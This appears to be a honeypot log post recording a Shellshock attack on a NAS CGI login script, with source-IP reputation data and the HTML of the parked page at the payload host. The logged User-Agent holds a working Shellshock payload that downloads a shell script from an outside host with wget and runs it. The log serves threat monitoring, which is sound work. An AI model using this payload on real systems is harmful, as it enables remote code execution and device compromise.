Sonntag, 29. November 2015

31.16.134.211 - Shellshock via http://qupn.byethost5.com

BEGIN OF HTTP DATA:
2015-11-28 17:55:32
Source IP: 31.16.134.211
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
 -t500
 END OF DATA
At the time of my analyse the accessiable site only showed a HTML side related to Goolgeaddsense.

31.16.134[.]211

    Static Source: GeoIP data
  • Country: Germany
  • ASN: AS31334 Kabel Deutschland Vertrieb und Service GmbH
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/31.16.134.211

Page:
<!DOCTYPE html>
<!--[if IE 8 ]><html class="ie8"><![endif]--><!--[if IE 9 ]><html class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]><!--><html><!--<![endif]-->
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title></title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <noscript><meta HTTP-EQUIV="REFRESH" content="0; url=/legacy"></noscript>
  <script src="//www.google.com/adsense/domains/caf.js" type="text/javascript"></script>
</head>
<body>
<script type="text/javascript">et=(function(){var
eD=window.location,eH={},dG,ej=eD.search.substring(1),eF,eG;if(!ej)
return eH;eF=ej.split("&");for(dG=0;dG<eF.length;dG++){eG=eF[dG].split('=');eH[eG[0]]=eG[1]?eG[1]:"";}
return eH;})();(function(){var
eD=window.location,X=document,cC=undefined,bd=encodeURIComponent,dA=X.getElementsByTagName('body')[0],eE;if(top.location!=eD)
top.location.href=eD.href;eE=X.createElement('script');eE.type='text/javascript';eE.src='/glp'+'?r='+(et.r?et.r:(X.referrer?bd(X.referrer.substr(0,255)):''))+'&u='+bd(eD.href.split('?')[0])+
(et.gc?'&gc='+et.gc:'')+
(et.cid?'&cid='+et.cid:'')+
(et.query?'&sq='+et.query:'')+
(et.a!==cC?'&a':'')+
(et.z!==cC?'&z':'')+
(et.z_ds!==cC?'&z_ds':'');dA.appendChild(eE);if(!window['googleNDT_'])
eD.replace('/legacy');})();</script>
</body>
</html>